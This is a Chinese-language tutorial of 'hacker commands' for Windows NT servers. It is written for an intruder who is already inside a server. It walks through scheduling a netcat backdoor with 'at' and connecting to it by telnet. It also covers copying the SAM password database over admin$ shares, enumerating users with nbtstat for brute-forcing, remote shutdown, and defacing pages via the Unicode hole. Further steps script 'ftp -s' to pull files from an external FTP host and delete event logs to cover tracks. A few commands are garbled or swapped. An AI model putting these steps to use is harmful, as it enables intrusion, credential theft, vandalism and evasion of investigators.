黑客命令之2:at

一般一个入侵者入侵后都会留下后门，也就是种木马了，你把木马传
了上去，怎么启动他呢？

那么需要用AT命令，这里假设你已经登陆了那个服务器。

你首先要得到对方的时间，

net time \\127.0.0.1

将会返回一个时间，这里假设时间为12:1,现在需要新建一个作业，其
ID=1

at \\127.0.0.1 12:3 nc.exe

这里假设了一个木马，名为NC.EXE,这个东西要在对方服务器上.

这里介绍一下NC,NC是NETCAT的简称,为了方便输入,一般会被改名.它
是一个TELNET服务,端口为99.

等到了12:3就可以连接到对方的99端口.这样就给对方种下了木马.

黑客命令之3:telnet

这个命令非常实用,它可以与远方做连接，不过正常下需要密码、用
户,不过你给对方种了木马,直接连到这个木马打开的端口.

telnet 127.0.0.1 99

这样就可以连到对方的99端口.那你就可以在对方运行命令了,这个也
就是肉鸡.

黑客命令之4:FTP

它可以将你的东西传到对方机子上,你可以去申请个支持FTP上传的空
间,国内多的是,如果真的找不到,我给个
http://WWW.51.NET,

不错的.当我们申请完后，它会给用户名,密码,以及FTP服务器.

在上传前需要登陆先，这里我们假设FTP服务器是
http://WWW.51.NET,

用户名是HUCJS,密码是654321

ftp www.51.net

他会要求输入用户,成功后会要求输入密码.

----------------------

下面先说上传,假设你需上传的文件是INDEX.HTM,它位于C:\下,传到对
方D:\

get c:\index.htm d:\

假设你要把对方C盘下的INDEX.HTM,下到你的机子的D盘下

put c:\index.htm d:\

黑客命令之5:copy

下面我说说怎样把本地的文件复制到对方硬盘上去，需要建立好
IPC$连接才有效。

这里我们把本地C盘下的index.htm复制到127.0.0.1的C盘下

copy index.htm \\127.0.0.1\c$\index.htm

----------------------

如果你要复制到D盘下把C改为D，就行了！

copy index.htm \\127.0.0.1\d$\index.htm

----------------------

如果你要把他复制到WINNT目录里

就要把输入

copy index.htm \\127.0.0.1\admin$\index.htm

admin$是winnt

----------------------

要把对方的文件复制过来，顺便告诉大家NT的备份的数据库放在
x:\winnt\repair\sam._ sam._是数据库的文件名

下面就把127.0.0.1的数据库复制到本地C盘下

copy \\127.0.0.1\admin$\repair\sam._ c:\

黑客命令之7：nbtstat

如果你扫到一部NT的机子，他的136到139其中一个端口开了的话，就
要用这个命令得到用户了。顺便告诉大家这是netbios，得到用户名后
就可以猜猜密码了。例如比较简单的密码，密码和用户名一样的，都
试下，不行就暴力破解吧！

现在网上很多NT的机子都开了这些端口的，你可以练习下，我们来分
析得到的结果。

命令是

nbtstat -A XX.XX.XX.XX

-A一定要大写哦。

下面是得到的结果。

NetBIOS Remote Machine Name Table

Name 无效 Status
---------------------------------------------
Registered Registered Registered Registered Registered
Registered Registered Reg
istered Registered Registered Registered
MAC Address = 00-E0-29-14-35-BA
PENTIUMII <00> UNIQUE
PENTIUMII <20> UNIQUE
ORAHOTOWN <00> GROUP
ORAHOTOWN <1C> GROUP
ORAHOTOWN <1B> UNIQUE
PENTIUMII <03> UNIQUE
INet~Services <1C> GROUP
IS~PENTIUMII...<00> UNIQUE
ORAHOTOWN <1E> GROUP
ORAHOTOWN <1D> UNIQUE
..__MSBROWSE__.<01> GROUP


粉红色的就是登陆过这部系统的用户，可能你不知道怎么看，大家是
不是看到了一窜数字，只要这窜数字是<03>的话，那他前面的就是用
户。

这里的用户是PENTIUMII。

黑客命令之8：Shutdown

关了对方的NT服务器的命令

Shutdown \\IP地址 t:20

20秒后将NT自动关闭，三思后才能运行这个命令，这样对对方造很大
的损失，要做个有良心的入侵者呀。
黑客命令之10：echo
著名的漏洞Unicode，这个命令可以简单的黑一下有这个漏洞的主
机。
我们假设我们要把“南京大屠杀铁证如山，任何日本人不得抵赖！”
写入index.htm，有2种方法，大家看看有什么区别。
echo 南京大屠杀铁证如山，任何日本人不得抵赖！>index.htm
echo 南京大屠杀铁证如山，任何日本人不得抵赖！>>index.htm
第一个的意思是覆盖index.htm原有的内容，把“南京大屠杀铁证如
山，任何日本人不得抵赖！”写进index.htm。
第二个的意思是把“南京大屠杀铁证如山，任何日本人不得抵赖！”
加到index.htm里面。
“>>”产生的内容将追加进文件中，“>”则将原文件内容覆盖。
大家可以本地试下。
可能你会问，这样简单黑下有什么好玩的，其实他可以用来下载主页
到对方的目录里。
1、首先，我们需要申请一个免费的主页空间。
2、用echo在可写目录下建立如下内容的txt文件：（以chinren服务器
为例。）
open upload.chinaren.com（你的FTP服务器，申请时你的空间提供商
会给你的）
cnhack（你申请时的用户名）
test（你申请时的密码）
get index.htm c:\inetpub\wwwroot\index.htm（这里是把你空间上
的index.htm下载到对方的c:\inetpub\wwwroot\index.htm）
bye（退出FTP对话，相当在98下的DOS，用EXIT退出DOS）
具体的做法：
输入 echo open upload.chinaren.com> c:\cnhack.txt
输入 echo cnhack >> c:\cnhack.txt
输入 echo 39abs >> c:\cnhack.txt
输入 echo get index.htm
c:\inetpub\wwwroot\index.htm+>>+c:\cnhack.txt
最后输入 ftp -s:c:\cnhack.txt （利用ftp的-s参数，执行文件里的
内容。）
等命令完成时，文件已经下载到你指定的文件里了。
注意：取得文件后，请删除cnhack.txt。（如果不删除，很容易会给
别人看到你的密码。）
记得要 del c:\cnhack.txt
黑客命令之11:attrib

这个命令是设置文件属性的。如果你想黑一个站，而他的主页的文件
属性设置了只读，那就很可怜呀，想删除他也不行，想覆盖他也不
行。倒！不过有这个命令就别怕了。

attrib -r index.htm

这个命令是把index.htm的只读属性去掉。

如果把“-”改为“+”则是把这个文件的属性设置为只读

----------------------

attrib +r index.htm

这个命令是把index.htm的属性设置为只读。
黑客命令之12:del

当你看到这个标题可别倒下啊！现在要离开127.0.0.1了，要删除日
志，当然要删除日志啦！想被捉吗。呵呵。

NT的日志有这些

del C:\winnt\system32\logfiles\*.*
del C:\winnt\ssytem32\config\*.evt
del C:\winnt\system32\dtclog\*.*
del C:\winnt\system32\*.log
del C:\winnt\system32\*.txt
del C:\winnt\*.txt
del C:\winnt\*.log

只要删除这些就可以了。有些系统NT安装在D盘或其他盘，就要把C改
成其他盘。